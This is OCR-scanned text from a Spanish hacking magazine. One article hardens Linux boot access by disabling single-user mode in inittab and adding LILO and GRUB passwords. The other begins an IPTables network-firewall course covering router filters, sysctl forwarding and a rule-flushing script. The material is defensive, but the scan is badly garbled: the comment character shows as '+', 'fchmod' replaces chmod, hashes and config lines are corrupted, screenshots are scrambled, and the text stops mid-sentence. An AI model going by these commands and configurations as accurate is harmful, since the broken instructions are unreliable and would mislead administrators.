no. Es decir, en cada uno de ellos esta 
definido que arranque de una manera 


en concreto, es como tener diferentes 
formar de entrar al sistema, dependiendo 
del trabajo que queramos desempeñar 
en ese momento. 


Los runlevels son 6, y aquí vemos qué es 
lo que hace cada uno: 


NIVEL MODO 

0 Detener el sistema 

1 Mono usuario, sin soporte de red 
2 Multiusuario, sin soporte de red 
3 Multiusuario con todo completo 
4 Solo recomendado para pruebas 
5 Multiusuario completo con entorno 

gráfico 
6 Reinicia el sistema 


Como podéis deducir el que habitualmente 
usamos es el 5 (con entorno gráfico), 
que es el que viene configurado por 
defecto. 


Ahora vamos a ver en qué archivo están 
los runlevels y cómo podemos 
configurarlo. El archivo en cuestión es el 
inittab, que esta en /etc/inittab. 


Para visualizarlo... 


Para visualizarlo basta con poner “less /etc/inittab“ 
(sin comillas claro). Explico esto puesto que la 
finalidad es llegar a todos los lectores, tengan el nivel 
que tengan Y 


Pero como lo que nos interesa es 
modificarlo, tenemos que editarlo. Para 
ello podemos elegir el editor de texto que 
queramos (como por ejemplo el vi, pico, 
emacs...). En nuestro caso elegiremos 
el vi, que es el que uso yo. 


Vamos entonces escribiremos vi 
/etc/inittab y nos mostrará el archivo 
para que podamos editarlo. 
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En este archivo tenemos lo primero el 
runlevel por defecto, que lógicamente lo 
podéis cambiar si queréis: 


Id:5:initdefault: 


Después nos explica los runlevels y justo 
debajo, allí los tenemos todos y cada uno 
de ellos con el orden desde el Va el 6: 


0:0:wait:/etc/init.d/rc O 
1:1:wait:/etc/init.d/rc 1 
2:2:wait:/etc/init.d/rc 2 


Y así hasta 6. Bueno, eso ya lo veis 
vosotros. 


La primera solución que podemos 
proponer para protegernos del ataque 
anteriormente descrito es la de impedir 
que pueda entrar en modo single o 
monousuario... ¿y como se hace eso? 
Pues de muchas maneras, la primera que 
se me ocurre es poniendo un comentario 
en la linea del init 1: 


Un comentario... 


Un comentario en Linux es poner una + delante de 
la línea que quieras que linux no lea o no ejecute. 


Pues bien, con el archivo /etc/inittab 
abierto con el vi, pulsamos “i” y 
entramos en modo insertar, es decir, ya 
podemos escribir en el archivo. Bajamos 
y nos colocamos en la línea del init 1 y 
ponemos esto: 


H1:1:wait:/etc/init.d/rc 1 
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No confundáis... 


No confundáis la ** de la shell con el comentario (+) 


en un archivo. 


Podemos apreciar que al colocar el 
comentario (++), la línea entera se pone 
del mismo color, esto quiere decir que 
esa línea queda descartada. 


Ahora solo nos queda grabar los cambios. 
Para eso pulsamos ESC (esto hace que 
salgamos del modo INSERTAR (i), 
seguidamente pulsamos : (pulsamos la 
tecla dos puntos) y escribimos x y le 
damos al INTRO. 


Con esto nos sacará a la terminal de 
nuevo, y ahora ya nadie podrá entrar en 
modo single o monousuario. Por lo tanto 
nadie podrá hacerse con la password del 
root. 


Pero esto es un poco... como diría... un 
sistema "a lo cutre”. Porque si nosotros 
(que somos los administradores) 
queremos entrar en modo monousuario 
para trabajar con ese runlevel, no 
podremos hacerlo... y eso “no es plan”!!! 


A continuación os enseñaré como podemos 
poner password al modo single, tanto en 
Lilo, como el Grub. De esta manera solo 
nosotros podremos entrar en modo 
monousuario Y. 


En LILO debemos ir a su archivo de 
configuración el cual esta en 
/etc/lilo.conf. Bueno ya sabemos como 
editarlo con el vi (vi /etc/lilo.conf). 


Nos saldrá una serie de explicaciones de 
configuración. Nos vamos al final y nos 
encontraremos algo parecido a esto: 
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Image=boo0t/vmlinuz-2.4.2-0.33.6 
Label=linux 

Root=/dev/hda4 
Initrd=/boot/initrd-2.4.2.-0.33.6.i1mg 
Read-only 


Pues bien, debéis añadir estas dos lineas: 


Restricted 
Password=laquetuquieras 


Quedandonos así: 


Restricted 
Password=laquetuquieras 
Image=boo0t/vmlinuz-2.4.2-0.33.6 
Label=linux 

Root=/dev/hda4 
Initrd=/boot/initrd-2.4.2.-0.33.6.i1mg 
Read-only 


Una vez escrito esto lo guardamos como 
antes lo he explicado, anda ir un poquito 
“pa tras” 5 


Pero la cosa no queda aquí, porque diréis... 
¿Cómo voy a dejar la password así, tan 
a la vista? Lo que tenemos que hacer 
entonces es poner permisos a ese archivo, 
para que solo el root pueda visualizarlo, 
lo ponemos con este comando. 


fchmod 600 /etc/lilo.conf 


IMPORTANTE 


Una vez guardado esto, debemos entrar en una terminal 


limpia como root y escribir la palabra “lilo””, si no 


los cambios no se guardarán correctamente. 
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Haciendo esto siempre os pedirá el 
password para entrar en modo 
monousuario y tendremos bien protegido 
nuestro sistema Linux Y 


Ahora vamos con el Grub, que es mas 
ue interesante. 


Nos vamos a una shell y llamamos la 
aplicación que nos va encriptar la password 
en mdb... si, has leído bien, Grub encripta 
tu password en md5. 


No necesitas... 


No necesitas saber nada sobre el MDS5 para seguir 
con el artículo, pero si te interesa saber qué es eso de 
la encriptación MDS te recuerdo que ya ha sido 
ampliamente tratado en los números anteriores de la 
revista. 


H+grub-md5-crypt 


Cuando pongamos eso nos pedirá una 
password, así que la introducimos y acto 
seguido nos da los hash de nuestra 
password (nuestra password encriptada). 
Anótala o cópiala, ya que luego lo 
necesitaremos. 


Para el que... 


Para el que nunca ha visto una password encriptada 
en MDS5, simplemente apuntar que obtendrá un 
CLIO parecido a esto: 
S1SUSJK7xFegdxWH6VuppCUSIb 


Vamos entonces al archivo de 
configuración de Grub, y lo editamos 
como antes hemos dicho, en mi caso: 


+vi'/boot/grub/menu.lst 


Tenemos varias opciones: el tiempo que 
esta Grub esperando antes de arrancar 
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automáticamente (timeout 8) y una lista 
de nuestros sistemas operativos. Pues 
bien, es algo como esto: 


Timeout 8 
Default O 
Fallback 1 


Title Linux 

Root (hd0,5) 

Kernel /boot/vmlinuz-2.4.22 
root=/dev/hda6 hdc=ide-scsi 
Title Windows XP Profesional 
Rootnoverify (hd0,0) 
Chainloader +1 


Lo que tenemos que hacer es bien 
sencillo, debemos colocar en medio de 
los dos bloques esta línea: 


password --md5 (y aquí la contraseña cifrada, el “churro”) 
Quedandonos de esta forma: 


Timeout 8 

Default O 

Fallback 1 

password —md5 $1 $U$JIK7xFegdxWH6VuppCUSIb 
Title Linux 

Root (hd0,5) 

Kernel /boot/vmlinuz-2.4.22 
root=/dev/hda6 hdc=ide-scsi 
Title Windows XP Profesional 
Rootnoverify (hd0,0) 
Chainloader +1 


¿Que no tienes la contraseña cifrada???!!! 
¿Qué no tienes el “churro”? ¿No dije que 
la anotases?... Vale, pues no pasa nada, 
puedes repetir los pasos anteriores para 
conseguirla de nuevo. 


Una vez escrito eso, se guarda (ya sabéis 
como editar y guardar). Pues muy bien, 
ya tenemos configurado el Grub. Ahora, 
cada vez que arranque tu sistema, en el 
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menú de Grub te pedirá de pulses la tecla 
“p” (para que puedas poner comandos)... 
¿y que te pide cuando pulsas la “p”? 


Correcto, la password que hemos creado 
para el grub (por supuesto en modo texto 
plano, olvídate ya del “churro”) % 


Bueno con esto hemos terminado de 
asegurar el acceso a los gestores de 
arranque, para evitar ser hackeados. 


A lo largo del artículo hemos visto los dos 
gestores de arranque mas famosos de 
Linux (LILO y GRUB), hemos accedido 
como root al sistema, y hemos conocido 
los diferentes tipos de RUNLELVELS... y... 
sobre todo... hemos aprendido a configurar 
de manera un poco más segura un sistema 
Linux. 


Sin mas que por el afán de haber distraído 
un rato al lector, me despido con un hasta 
luego Y 


Agradecimientos a los miembros de la 
revista, ya que cada mes hacen despertar 
esa maravillosa sensación que llevamos 
en nuestro interior, me refiero por 
supuesto a la CURIOSIDAD. 


Gonzalo Asensio Asensio 
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¿Ya estás cansado de este curso? ¿Seguro? Pues venga. que ya queda poco!ll 
Para los aplicados. este mes veremos. entre otras cosas: como proteger una red de 


ordenadores. filtros [de salida, MAC. NAT-PAT...). equinbrio de carga... ... 


En el artículo anterior construimos un 
cortafuegos diseñado para defender a 
una máquina con una sola tarjeta de 
red... (tarjeta, NIC, interfaz, interface... 
elige el nombre) 


Esa implementación era buena para los 
casos en los que nos “enfrentamos” ante 
una red no confiable (como puede ser 
Internet) desde un PC, portátil o máquina 
individual. Obviamente, si disponemos 
de varias máquinas deberíamos adoptar 
soluciones individuales para cada una de 
ellas, ufff... ¿y si son 125? ¿y si hay 
distintos sistemas operativos presentes? 
¿y si hay varias redes o subredes? ¿y si 
existen otros dispositivos de filtrado como 
routers u otros firewalls? 


Pues si alguno de esos casos están 
presentes, es probable que la arquitectura 
de cortafuegos descrita en el artículo 
anterior no sea la adecuada... sobre todo 
si lo que tenemos es una red con muchas 
máquinas, tendríamos que administrar, 
configurar e implementar decenas de 
cortafuegos individualmente, eso es un 
gasto administrativo importante a la vez 
que pesado y monótono... 


El escenario sobre el cual se basa este 
artículo es el de una pequeña red 
empresarial en la que disponemos de 
una red interna (LAN) que quiere 
comunicarse con otras redes dentro de 
esa misma empresa o que necesita 


comunicación con Internet, la idea 
principal es esta: 


> Disponemos de un número 
indeterminado de máquinas conectadas 
a un switch/hub que brinda la conexión 
ethernet para los recursos internos de 
la empresa-casa-colegio-lo-que-sea. 


> Esa LAN opera en el rango de red 
192.168.0.0/24 y dispone de sus 
propios servidores FTP, Web, DNS, 
Correo, etc... unos "para consumo 
propio”, es decir, accesibles sólo desde 
la Intranet y otros que ofrecen servicios 
a clientes externos. 


> En esa misma red local queremos 
implementar un cortafuegos 
implementado en una máquina LINUX 
con dos tarjetas de red, las cuales 
enlazarán dos redes distintas, una sería 
la propia LAN y la otra NIC conecta 
otra red local de rango 172.28.0.0/16 


> La máquina LiNUX tendrá, por tanto, 
al menos dos interfaces, cuyas 
direcciones IP son: 


Ethi, para la red interna: 
192.168.0.254/24 
Eth0, para la red externa: 


172.28.0.254/16 


> Ciertamente la red 172.28.0.0/16 es 
otra red interna, en el ejemplo que 
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nos ocupa se tratará de una “especie” 
de zona desmilitarizada en la que 
podremos alojar los servidores 
públicos, el router que conecta a 
Internet, etc... es decir, para ser más 
claros, en la red 172.28.0.0/16 
dispondremos de: 


> Un Switch-hub (que aunque 
pueden tener IP's no lo tendremos 
en cuenta) 

>» Un router con IP ¡interna 
172.28.0.1/16 e IP pública (la-que- 
sea, no importa) 

> Otra/s máquinas con IP's (las que 
sean) que formasen esa DMZ. 


> Los clientes de Internet entrarán a 
nuestra red interna (si lo permitimos) 
a través del router, éste redireccionará 
por puertos el tráfico y se lo entregará 
al cortafuegos LiNUX-IPTables con IP 
172.28.0.254/16 quien se encargará 
de traducir y entregar el paquete de 
datos al host que pertenezca a la red 
192.168.0.0/16 


Obviamente ese cortafuegos deberá 
funcionar como “algo más” que un 
simple reenviador de datos, existirán 
filtros que limitarán las posibilidades 
de conexión. 


» Todas las comunicaciones de los 
clientes de la LAN (192.168.0.0/24) 
pasarán a través del cortafuegos, ya 
sea para comunicarse con la red 
172.28.0.0/16 o para salir a Internet. 
Para ello ese firewall tendrá que 
comunicarse con esas dos redes (por 
eso necesitaremos más de una NIC en 
el cortafuegos) 


YA 


de cada caso, pero es simple y con 
“diferentes” actores: cortafuegos, 


switches, routers, dos redes LAN, varios 
servidores del lado de cada LAN, etc... 


Gráficamente el escenario es este: 


Switch LAN: 192.168.0.0/24 


NIC; 192.168.0.254/24 


LINUX+Firewall+Router+IPTables 


NIC: 172.28.0.254/16 


pra 4 Sveitch LAN: 172.28.0.0/16 


a 


Como ya se ha dicho, la configuración y 
administración del router LAN/WAN 
queda fuera del objeto de este artículo, 
sin embargo supongamos que existen (al 
menos) las siguientes directivas, filtros 
y listas de acceso: 


red empresarial 
protegida. 


> Por su Interfaz interna, sólo aceptará 
paquetes que provengan de la IP 


Ni mucho menos pretendo “defender 
este diseño de red, ni es el mejor, ni el 
peor, ni el más idóneo, todo dependerá 


172.28.0.254 (la IP de la NIC del 
firewall LINUX) 
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Pantalla 1. Filtros de 


salida del router 
LAN/WAN 


>» Traducción de direcciones de red 
(NAT) activada (traduce las IP's de la 
LAN 172.28.0.0/16 en la IP pública 
asignada y además, redirecciona a la 
máquina 172.28.0.254/16 de todas 
aquellas conexiones cuya IP origen 
sea Internet. 


» Como medida de seguridad adicional, 
sólo aceptará paquetes de datos cuy 
origen sean las IP's internas 
anteriormente citadas y filtra por MAC 
las mismas, o sea, que para que se 
pueda acceder al router desde la LAN, 
además de verificar que la IP origen 
sea 172.28.0.254/16, se toma en 
cuenta la MAC origen. Si “alguien” 
lograse hacer un IP-spoof, también 
tendrá que falsear la MAC, cosa que 
si disponemos de "un buen” switch les 
será bastante complicado (por no decir 
imposible). 


Si bien queda fuera del ámbito de este 
texto, voy a poner unas pantallitas de 
cómo estaría configurado este router 
junto con una breve explicación de las 
mismas 


Filtros de salida 


Se deniega cualquier tráfico de datos 
cuyas IP's no sean las que se han descrito. 


Outbound Packet Filter 


» Outbound Filter 


E Enable 


O Allow all to pass except those match the following rules 
(O) Deny all to pass except those match the following rules. 


ID | Source IP : Ports Destination IP : Ports Enable 


1 
2 
3 
4 
5 
6 
7 
8 


17228.0.254 


Save] [Undo] [— InboundFiter— ][_MACLevel. ] [Help] 
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Filtros MAC 


Sólo podrán acceder al router las I1P's que 
se muestran si su MAC es la que se ha 
relacionado. Esto creará un pequeño 
problemita si un buen día cambiamos de 
tarjeta de red en cualquiera de esas 
máquinas y el problemita sería más grave 
si cambiamos las dos tarjetas de red... 
tendríamos que acceder al router por 
consola o resetearlo por completo (si se 
deja), pero eso es otra historia... 


MAC Address Control 


Setting 


D MAC Address Control [4] Enable 


00-05-10-1F-F9-68 172.28.0. 254 
172.28.0. 
172.28.0. 
17228.0 


DHCP clients | — select one — X[[ Copy to Jm - 4 


Previous page ][ Nexpage ] (Save ] [ Undo ] [Help] 


Filtros NAT-PAT 


Aquí podemos hacer varias cosas, una de 
ellas sería redirigir todas las peticiones 
que vengan de Internet hacia la IP 
172.28.0.254 (que es una de las interfaces 
del cortafuegos), o bien, utilizar el mismo 
router como "primer filtro” ante Internet... 


Obviamente la solución más efectiva es 
la segunda, de ese modo “ocultaremos” 
el cortafuegos tras el router, eso sí, la 
lista de servicios que ofrece nuestra LAN 
tendremos que relacionarla tanto aquí 
como en la arquitectura del cortafuegos 
IPTables. 


Estos servicios que pretendemos ofrecer 
son: DNS, FTP, WEB, Terminal Services, 
SMTP y POP3, o sea, que hay que abrir 
los puertos 53, 21, 80, 3389, 25 y 110 
en el router y entregarle esas conexiones 
al firewall (1P 172.28.0.254) que ya se 
las apañará.... 


[E Connection control — Clients with C checked can connect to this device, and | allow Y unspecified MAC addresses to connect. 


1D | MAC Address IP Address 


Pantalla 2. Filtrado por 


MAC en el router 
LANWAN 
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Virtual Server 


A se 
60 [254 


Pantalla 3. Filtros 
NAT/PAT en el Router 
LAN/WAN 


Z 
ES] 


172.26.0/2 
er 172.28.0/254 
25 172.28.0 
110 172.28.0. 
¡53 172.28.0. 
143 172.28.0. 
22 172.28.0. 
¡9369 172.28.0. 
172.28.0. 
172.28.0 
172.28.0, 
172.26.0. 


aaa 


MON EEEEEE! 


111113777 


Well known services | -- select one -- | Copyto [¡D[-- y] 


Bueno, este router tiene mas filtros: de 
administración remota, de telnet, para 
DDNS, etc... no es el caso, no se trata 
de aprender como administrar el router, 
estamos con IPTables.... pero he creído 
conveniente mostrar los ejemplos para 
entender una cosa, ALGO 
IMPORTANTE: 


» Cuando construyamos el cortafuegos 
IPTables con NAT, tendremos que 
traducir las direcciones de red 
192.168.0.0/24 en una única 
dirección... ¿cuál? Pues en la 
172.28.0.254!!! porque sino el router 
desechará el paquete de datos, le 
acabamos de explicar que sólo se 
pueden comunicar con él, la IP 
172.28.0.254!!!! 


>Cuando el router reciba el paquete 
de datos, volverá a hacer NAT de la 
red 172.28.0.0/16 y lo traducirá a la 
IP pública asignada, es decir, si le 
llega algún tipo de tráfico que no sean 
esas IP's lo descartará... de este modo, 
aun en el supuesto que algún “listillo” 
cambie los cables de su PC, gane 
acceso como administrador de su PC 
cambiando la IP al rango 
172.28.0.0/16 y se conecte 
directamente al switch de la red en 
la que está el router, NO TENDRÁ 
COMUNICACIÓN, porque su IP no será 
la permitida... 
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Esto es importante si en la red hay 
usuarios móviles (con portátiles, por 
ejemplo) si un buen día llega uno se 
pone como IP dentro del rango 
172.28.xxx.xxx/16 y se conecta 
directamente al switch... el router lo 
ignorará Y 


> En una frase, o perteneces a la red 
192.168.0.0/24 y tienes como 
puerta de enlace la IP 
192.168.0.254, o no te comunicas, 
ni con la LAN ni con Internet, ni con 
nada. 


Bien, ahora empecemos de una vez con 
el diseño de cortafuegos de red.... 


Opciones de configuración para 
sysctl 


Al igual que en el artículo anterior debemos 
verificar previamente si nuestro LINUX, 
mejor dicho, si las opciones de núcleo 
están “preparadas” y si se permite el 
reenvío de paquetes, la redirección, la 
validación de origen, etc... Esto se 
consigue manejando las opciones de 
sysctl 


Tabla 1. Opciones y 
valores de sysctl.conf 
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Alguna aclaración se ha de hacer: 


> En aquellas opciones donde aparece 
“interfaz”, se puede escribir el nombre 
de la tarjeta de red. También sería 
correcto incluir la palabra “all” para 
referirse a todas... por ejemplo: 


> Estas opciones se han de incluir en 
el archivo /etc/sysctl.conf 


Para ello, podemos editar dicho archivo 
con nuestro editor de texto preferido 
o incluir directamente los parámetros 
usando la orden systcl —-w seguida de 
la opción y valor, por ejemplo: 


No hay que olvidar que tras la/s 
modificaciones efectuadas tendremos 
que usar: 


| Sysctl =p|para que los cambios tomen 


efecto, tanto si usamos un editor de 
texto como si lo hacemos desde la 
línea de terminal. 


Algunas opciones de sysctl pueden 
resultarte “complejas” si no conoces 
bien algunos de los protocolos que 
forman la pila TCP/IP, por ejemplo 
ipfrag, pmtu, broadcast. 


Verifiquemos el archivo /etc/sysctl.conf 


A Jetc/syscti.conf - gedit - 5X 


Archivo Editar Ver Buscar Documentos Ayuda 


DBA xQ; 9 e /2Xx0BRQR BA 


Nuevo Abrir Guardar Cerrar Imprimir Deshacer Rehacer Cortar Copiar Pegar Buscar Reemplazar 


1 $ Kernel sysctl configuration file for Red Hat Linux 
+$ 
$ For binary values, 0 is disabled, 1 is enabled. 
$ sysctl.conf(5) for more details. 


$ Controls IP packet forwarding 


Gnet.ipv4.ip_forward = 0 


9 
104 Controls source route verification 


11 
Qnet.ipv4.conf.default.rp filter = 0 
13 


15kernel.sysrq = 0 


16 
174 Controls whether core dumps will append the PID to the core filename. 
18% Useful for debugging multi-threaded applications. 
19kernel.core_uses_pid = 1 

20 


Ln 13, Col. 1 


Ahora vamos a revisar y/o configurar 
TCP/IP en los clientes de la red y en el 
cortafuegos. 


Revisando la Configuración 
TCP/1P del cortafuegos y sus 


clientes 


Ya hemos dicho que hay una serie de 
máquinas en una LAN, la que corresponde 
al rango 192.168.0.0/24, y que nuestro 
cortafuegos dispone de dos tarjetas de 
red, una en el rango anterior y otra en el 
rango 172.28.0.0/16 


Empecemos por el cortafuegos, para ello 
recurriremos a ifconfig a ver que nos 
dice... 
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See sysctl(8) and 


144 Controls the System Request debugging functionality of the kernel 


4 rootWlinux-rh8:- 
Archivo Editar 
[rootalinux-rh8 root]* ifconfig 
etho Link encap:Ethernet HWaddr 00:05:1C:1F:F9:68 

inet addr:172.28.0.254 Bcast:172.28.255.255 Mask:255.255.0.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:49 errors:0 dropped:0 overruns:0 frame:0 

TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:100 

RX bytes:8587 (8.3 Kb) TX bytes:1050 (1.0 Kb) 

Interrupt:11 Base address:0xc000 


Ver Terminal lr Ayuda 


Link encap:Ethernet HWaddr 00:05:1C:08:AE:7C 
inet addr:192.168.0.254 Bcast:192.168.0.255 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:100 

RX bytes:0 (0.0 b) TX bytes:240 (240.0 b) 
Interrupt:5 Base address:0xe000 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:92 errors:0 dropped:0 overruns:0 frame:0 
TX packets:92 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 

RX bytes:5976 (5.8 Kb) TX bytes:5976 (5.8 Kb) 


Pantalla. 
Configuración TCP/IP 
en las interfaces del 

cortafuegos 


Ahora revisemos la configuración TCP/IP 
de cualquier cliente de la LAN interna. 


es CoWINDOWSS ystem32cmd.exe [of 


ictor>ipconfig 


Mask:255.255.255. 


Ahh!!! ¿Y cuales son las 
puertas de enlace de cada una 
de las interfaces del propio 
cortafuegos? 


b Para la interfaz eth0, que 
conecta la red 172.28.0.0/16, su 
puerta de enlace es EL 
ROUTER!!!, es decir, la IP 
, 172.28.0.1/16 


b Para la interfaz de LAN 
interna (ethi), la que se 
corresponde con la red 
192.168.0.0/24 NO HAY PUERTA 
DE ENLACE!!! 


Ahora vamos a comprobar la 
conectividad, lo haremos desde 
el cliente, primero comprobar que 
llegamos al cortafuegos.... 


es C:WINDOWSiSystem3 21cmd.exe 


nectividad entre el 
cliente y su puerta de 


tiempo<ím =-64 
tiempo<im TTL=64 


para 192.168.8.254: 
a s 4, recibidos 4, perdidos 
<B% perdidos), enlace 


Tiempos apr dos de ida y vuelta en milisegundos: 


Perfecto... probemos con la “otra” red... 


er C:WINDOWSiSystem32iemd.exe 


dllente y la puerta de 


ados iid foso 1 DL 4, enlace externa del 


perdidos 


os de ida y vuelta en milisegundos: 


¡Configuración IP de Windows 
lidaptador Ethernet Conexión de área local 
92.168.8.58 


.Q 
.168.8.254 


ICixDocuments and Set 


Como vemos, este cliente tiene como IP 
192.168.0.50/24 y como puerta de 
enlace: 192.168.0.254 que es una de 
las IP's del cortafuegos LINUX IPTables 
$ 


| Configuración TCPIP 
de un cliente 
cualquiera de la LAN 


interna. 
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a otado 
agotado 


conectividad entre el 


licitud. 


> ping para 1 8.8.1: 
s , recibidos = 8, 


cliente y una dirección 
¡Pextema. 


perdidos 4 


ICiDocuments and SettingsWictor> 


¿Qué diferencia hay entre ambas 
pantallas? 


Ya... claro... en una hay respuesta y en 
la otra no... lo que quería preguntar es 
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¿Por qué se llega a la IP 172.28.0.254 
(la ethO del cortafuegos) y no a la 
172.28.0.1 (la interfaz interna del 
router)? 


Pues porque los paquetes de datos 
NO SALEN del cortafuegos, las 
opciones de reenvío están deshabilitadas, 
por tanto nuestro LiNUX "no sabe” 
entregar paquetes de datos a ninguna 
otra sitio que no sean sus propias IP's. 


Vale, vamos a solucionar esto habilitando 
esas dos opciones del archivo 
/etc/sysctl.conf.... 


Pantalla 10. 
Configuración correcta 


Editamos dicho archivo y cambiamos 
los valores a 1, luego ejecutamos la 
orden sysctl -p 


del archivo 
Jete/sysctl.conf 


Ahora probemos con el ping a la IP 172.28.0.1 
(el router) que antes no “llegábamos” 


conectividad entre un 


bytes 


cliente y la red 
:E 


4, os = 4, perdidos = 8 172.28.0.0/16 con 
éxito 


ida y vuelta en milisegundos: 
0 = Íms, Media = íms 


Vale... ya recibimos respuesta del router... y 
también podremos acceder a cualquier otra 
IP de las redes 172.28.0.0/16 y de la red 
192.168.0.0/24... pero... ¿Y si probamos 
con una IP de Internet?, por ejemplo a 
google.... 


ex CoWINDOWSiSystem32kemd 


de conectividad de un 
cliente a Intemet. El 
servidor de google 


8, perdidos = 


O Jetc/sysctl.conf - gedit OO N ERES 
Archivo Editar Ver Buscar Documentos Ayuda 


DBGBO <Q; . e /x0B¡n A 


Nuestro gozo en un 
pozo... resulta que no 


mn cd ( y Cerrar Imprimir Deshacer ce Cortar Copiar Pegar Buscar Reemplazar llegamos a Internet... 

sysctl.con! 

1 $ Kernel sysctl configuration file for Red Hat Linux ¿Será el router? ¿Será 

2 +4 a y 

3 $ For binary values, 0 is disabled, 1 is enabled. See sysct1(8) and que no escribimos bien 

4 $ sysctl.conf(5) for more details. y pa z 

5 la IP? ¿qué será? 

6 $ Controls IP packet forwarding 

7 

«E pvs-19 torera = 1) Pues no voy a “mostrarlo”, 

e Controls source route verification pero el router está bien 

Ip cont detesto tir y la IP es correcta. No voy 

14$ Controls the System Request debugging functionality of the kernel a poner las pantallitas, si 

15kernel.sysrq = 0 ] E 

16 hago ese mismo ping 

17% Controls whether core dumps will append the PID to the core filename. 

184 Useful for debugging multi-threaded applications. desde el cortafuegos, hay 

19kernel.core_uses_pid = 1 r 

20 respuesta, créelo, lo que 
pasa es que nuestro 

Ln 12, Col. 36 


bd rootOlinux-rh8:- 
Archivo Editar Ver Terminal Ir Ayuda 


[rootalinux-rh8 root]%* sysctl -p 
net.ipv4.ip_forward = 1 


> Pantala 1 Actualizar net.ipv4.conf.default.rp_filter 
kernel.sysrq = O 
kernel.core_uses_pid = 1 
[rootalinux-rh8 root]* 


valores del archivo 
Jetc/sysctl.conf 
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LINUX ya sabe que tiene 
que pasar los paquetes de la red 
192.168.0.0 a la red 172.28.0.0, pero no 
sabe qué hacer cuando le llega un paquete 
con destino a otras redes... tampoco sabe 
qué hacer con las respuestas de esas 
redes en caso de que las reciba... 
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Tenemos que configurar 
IPTables para explicarle que 
todo aquello que entre por 
una interfaz se lo entregue 
a la otra y viceversa.... es 
decir, habilitar el reenvío 
de paquetes desde 
IPTables. 


El Reenvío de 


Paquetes 


Los ejemplos que vienen a 
continuación son la forma más 
rudimentaria y sencilla de 
configurar IPTables para que 
los datos de una red pasen 
a otra y a su vez, se 
encaminen correctamente. No 
ofrecen seguridad alguna, es 
decir, el cortafuegos se 
comportará como un simple 
intermediario, colocando los 
paquetes de datos en la 
puerta de enlace adecuada y 
en la tarjeta de red oportuna, 
no tomará decisiones en 
cuanto al origen, ni aplicará 
filtros, ni registrará accesos, 
ni nada de nada... (al menos 
de momento). 


Lo primero que haremos es 
“limpiar” las posibles reglas 
que existiesen previamente 
en IPTables, iniciar el servicio 
si no lo está, etc... 
¿recuerdas el script del 
número anterior que 


E. NOIPT. bd - Bloc de notas 
Archivo Edición Formato Ver 
lfbivish 


(- 15)Px) 


Ayuda 


% Cortafuegos IPTFW2-HxC 

$ 

H 

H Firewall para una máquina con una sola tarjeta de red 

$ Reglas restrictivas de E/S, validación yy anti-flood 

$$ Derechos Reservados (c) Vic_Thor 2004 Foros HackCrack 
hd 

% http: /hararv hackxcrack.coruphpBB2findex.php 

$ 

H Software Libre, puedes rodificarlo 7/0 distribuirlo bajo 
$4 los términos de la Licencia GNU publicada por: 

E Free Software Fundation, wwrw.gnu.cora 


IPT="/sbiwiptables" 


$ COMPROBAR EL ESTADO DE IPTABLES 


if [!-x$1PT] 

then 
echo "Error: No se puede ejecutar HIPT , Revisa la configuración" 
exit 1 

ñi 


$ BORRADO DE CADENAS, REGLAS Y PUESTA A CERO DE CONTADORES 


$IPT -P INPUT ACCEPT 
$IPT -POUTPUT ACCEPT 
$IPT -P FORWARD ACCEPT 
$IPT -F 
$IPT -X 

for tabla in filter nat mangle 
do 

SIPT -t $tabla -F 

SIPT -t $tabola -X 

SIPT -t $tabla -Z 

done 
service iptables save 
service iptables restart 


| Código 1. Script de 
Inicialización para 
£ IPTables, /NOJPT 


llamamos ./NOIPT? Pues vamos a 


usarlo para dejar “limpito” IPTables y en 


funcionamiento... 


También lo puedes descargar de 
http://www.forohxc.com/Docs/fw/24/N 
OITPT. txt 


Por si acaso no lo tienes o no lo recuerdas, 


este era: 
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Lo ejecutamos mediante ./NOIPT y 
recuerda que este script lo usaremos 
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siempre que queramos empezar desde 
cero.... es útil para no tener que andar 
vaciando las cadenas, limpiando reglas, 
etc... lo hacemos “de un golpe” 


Ahora añadiremos lo siguiente: 


[E] root linuxcrhs:> 


Archivo Editar Ver Terminal lr Ayuda 

[rootelinux-rh8 root]* ./NOIPT ES] 
Guardando las reglas actuales para /etc/sysconfig/iptables: 
Vaciando todas las reglas actuales y las cadenas definidas 
Eliminando todas las reglas actuales y cadenas definidas po 
Aplicando reglas del firewall iptables: 

[rootelinux-rh8 root]% 


a Ed 
p 
7 


- Código 2 Preba de Con esto acabamos de explicar a IPTables 
que ACEPTE los paquetes que se originen 
en la interfaz eth0 (172.28.0.254) y los 
reenvíe (FORWARD) a la interfaz eth1 


(192.168.0.254) y viceversa. 


reenvío de paquetes 
de una red a otra 


Pero... no lo tendremos todo ganado, 
aparentemente deberíamos ser capaces 
de traspasar paquetes por el cortafuegos 
y éste se ha de encargar de posicionarlos 
en las interfaces correspondientes para 
que sean enrutados, pero.... 
ver qué ocurre cuando hacemos un ping 
a la dirección de google.... 


vamos a 


y CoOWINDOWSSystem321cmd.exe 


pu 


ICixDocuments and S 


59.184 


Haciendo ping de datos: 


4 


ICinDocuments and SettingsWWictor> 


Panta 14. Prueba 
de conectvidad entre Bufff, seguimos igual.... ¿qué 


ocurrirá? 


el cliente e Intemet. 
Fallida.... 


Vamos a poner a escuchar un esnifer en 
el cortafuegos, por la interface eth0, que 
es la “externa”.... escuchemos.... 
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hd rootOlinux-rh8:- -. D0X 
Archivo Editar Ver Terminal lr Ayuda 

18:03:34.043860 192.168.0.50.1029 > 195.235.96.90.domain: 
18:03:35.067951 arp who-has 172.28.0.50 tell 172.28.0.1 
18:03:36.046990 192.168.0.50.1029 > 195.235.113.3.domain: 26+ A? ww.google.es. (31) 
82032 7 9 8 o 9 9 omaio; 26+ A? www.google.es. (31) 


26+ A? www.google.es. (31) E 


8:03:36.225639 arp who-has 172.28.0.50 tell 172.28.0.1 


8:03:36.766339 arp who-has 172.28.0.50 tell 172.28.0.1 


8 packets received by filter 
O packets dropped by kernel 
AA root]* 


| Pantalla 15. Captura 


En ese recuadrito rojo hay “algo” 


especial.... de paquetes porel 


esnifer en eth0 


Resulta que el switch al que está conectado 
el router y una de las tarjetas del 
cortafuegos ha ¡nterpretado 
equivocadamente que la IP que 
